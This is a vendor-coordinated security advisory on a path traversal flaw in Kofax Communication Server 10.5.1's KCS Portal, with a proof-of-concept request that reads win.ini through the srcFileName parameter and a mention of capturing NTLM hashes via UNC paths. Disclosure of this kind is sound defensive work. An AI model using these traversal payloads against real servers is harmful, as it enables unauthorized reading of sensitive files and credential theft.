usd-2025-66 | Kofax Communication Server 10.5.1 - Path Traversal

Product: Kofax Communication Server
Affected Version: 10.5.1
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Security Risk: Critical
Vendor: Tungsten Automation
Vendor URL: https://www.tungstenautomation.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Not requested yet
Advisory ID: usd-2025-66

Description

Kofax Communication Server (KCS), formerly known as TOPCALL is used as a message broker, mainly for TELEX messages (aerospace-specific messages that, for example, inform about airplane movements). Other message types, such as AFTN, ASCARS, SMS and FAX are supported, too.

The web application KCS Portal allows configuration of allowed recipients and senders, viewing transmitted messages, monitoring functionality, user management, and composing messages.

The web application is vulnerable to path traversal attacks.

When downloading attachments from messages, the source file name as stored on the backends disk is passed as a parameter in the URL.
The srcFileName parameter is not validated and therefore allows attackers to specify arbitrary files including directory traversals (../) and absolute Paths (*C:*) outside the download directory.

This vulnerability allows an attacker to read from the application's underlying file system.
By this, it is possible to retrieve configuration files, password or login information or any other files containing sensitive data.

Proof of Concept

The following request allows to download the file C:\Windows\win.ini from the application server:

GET /kcsportal/api/v1/download/[redacted]?Kcs-ConnectionHandle=[...]&srcFileName=./../../../../../../Windows/win.ini&destFileName=test.html HTTP/1.1
Host: [redacted]
Cookie: [redacted]

The server responds with the content of the requested file:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; 
filename=test.html
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Furthermore, it is possible to specify UNC paths as source file name. If an attacker is able to run an SMB server in the adjacent network, it is possible to capture the NTLM hash of the user running the server application.

Fix

It is recommended to filter all input that is used in the context of file operations for path specifications.
Ideally, the file system of the application should be isolated, e.g., using sandboxing.

References

• https://owasp.org/www-community/attacks/Path_Traversal

Timeline

• 2025-12-03: Vulnerabilities reported to Tungsten Automation.
• 2026-01-29: For TCS version 2025.3, the fix FR23775 is released.
• 2026-03-06: Public disclosure of this vulnerability.

Credits

This security vulnerability was identified by Dominique Dittert, Roman Hergenreder & Samuel Stein of usd AG.